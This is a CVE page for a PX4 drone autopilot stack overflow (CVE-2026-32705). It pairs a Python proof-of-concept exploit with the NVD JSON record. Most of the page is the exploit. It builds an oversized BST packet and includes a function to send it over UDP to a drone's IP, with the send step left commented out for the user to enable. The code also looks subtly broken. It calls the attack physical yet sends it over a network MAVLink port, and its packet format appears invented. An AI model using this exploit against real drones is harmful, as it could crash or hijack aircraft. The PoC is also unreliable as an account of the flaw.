CVE-2026-32705

#!/usr/bin/env python3 # CVE-2026-32705 PoC - Malicious BST Device Simulation # This PoC demonstrates how a malicious BST device can trigger stack overflow # in PX4 autopilot's BST telemetry driver import struct import socket import time def create_malicious_bst_packet(): """ Create a malicious BST packet with oversized dev_name_len to trigger stack overflow in PX4 BST telemetry driver """ # BST message header bst_magic = 0x424C # 'BL' magic bytes msg_type = 0x0001 # Device info message type # Malicious oversized dev_name_len # This will cause stack overflow when driver writes string terminator malicious_dev_name_len = 0xFFFF # Oversized length without bounds check # Build malicious BST packet packet = struct.pack('<HH', bst_magic, msg_type) packet += struct.pack('<H', malicious_dev_name_len) # Add oversized device name data overflow_data = b'A' * malicious_dev_name_len packet += overflow_data return packet def exploit_px4_bst_telemetry(target_ip='192.168.1.100', target_port=14556): """ Send malicious BST packet to trigger CVE-2026-32705 Args: target_ip: IP address of the PX4-enabled drone target_port: BST telemetry port (default MAVLink port) """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) malicious_packet = create_malicious_bst_packet() print(f"[*] Sending malicious BST packet to {target_ip}:{target_port}") print(f"[*] Packet size: {len(malicious_packet)} bytes") print(f"[*] Malicious dev_name_len: 0xFFFF") sock.sendto(malicious_packet, (target_ip, target_port)) print("[+] Malicious packet sent successfully") print("[!] Target PX4 BST driver may have crashed or been exploited") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False def simulate_bst_device(): """ Simulate a malicious BST device that can be connected to drone's BST port This represents the physical attack vector (AV:P) """ print("=" * 60) print("CVE-2026-32705 - PX4 BST Telemetry Stack Overflow PoC") print("=" * 60) print("\n[*] Attack Vector: Physical access to BST telemetry port") print("[*] Target: PX4 autopilot < 1.17.0-rc2") print("[*] Vulnerability: Stack overflow via oversized dev_name_len") print("\n[!] This PoC is for educational and authorized testing purposes only") print("\n[*] Simulating malicious BST device...") # Generate the malicious packet packet = create_malicious_bst_packet() print(f"[+] Generated malicious BST packet") print(f" - Magic: 0x424C") print(f" - Message Type: 0x0001 (Device Info)") print(f" - dev_name_len: 0xFFFF (malicious oversized value)") print(f" - Total packet size: {len(packet)} bytes") print("\n[*] When received by vulnerable PX4 BST driver:") print(" 1. Driver reads dev_name_len = 0xFFFF") print(" 2. Driver writes string terminator at stack offset 0xFFFF") print(" 3. Stack buffer overflow occurs") print(" 4. Return address / function pointers can be overwritten") print(" 5. Arbitrary code execution possible") return packet if __name__ == "__main__": simulate_bst_device() # Uncomment to actually send the packet: # exploit_px4_bst_telemetry('DRONE_IP', 14556)

{"cve": {"id": "CVE-2026-32705", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:41.403", "lastModified": "2026-03-17T17:16:15.363", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the BST telemetry probe writes a string terminator using a device-provided length without bounds. A malicious BST device can report an oversized dev_name_len, causing a stack overflow in the driver and crashing the task (or enabling code execution). This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, la sonda de telemetría BST escribe un terminador de cadena utilizando una longitud proporcionada por el dispositivo sin comprobación de límites. Un dispositivo BST malicioso puede informar un dev_name_len sobredimensionado, causando un desbordamiento de pila en el controlador y bloqueando la tarea (o permitiendo la ejecución de código). Esta vulnerabilidad está corregida en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-79mp-34pp-2f3f", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-79mp-34pp-2f3f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}